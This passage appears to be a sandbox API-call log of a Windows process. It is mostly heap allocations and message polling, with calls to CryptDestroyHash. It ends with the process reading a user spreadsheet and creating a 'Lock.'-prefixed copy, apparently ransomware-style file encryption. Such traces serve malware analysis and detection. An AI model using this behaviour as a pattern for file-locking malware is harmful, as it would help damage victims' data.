[0262.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.901] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0262.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.902] CryptDestroyHash (hHash=0xaa5920) returned 1 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.905] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0262.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0262.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0262.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.909] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/IqPW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iqpw.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0262.910] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0262.910] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0262.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0262.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0262.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.IqPW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.iqpw.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0262.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0262.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0262.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.913] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0262.913] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0262.916] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x82e1, lpOverlapped=0x0) returned 1 [0262.917] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0262.919] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0262.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x182e1) returned 0x24b7a48 [0262.919] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.920] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.920] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0262.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0262.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x182e1) returned 0x24b7a48 [0262.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 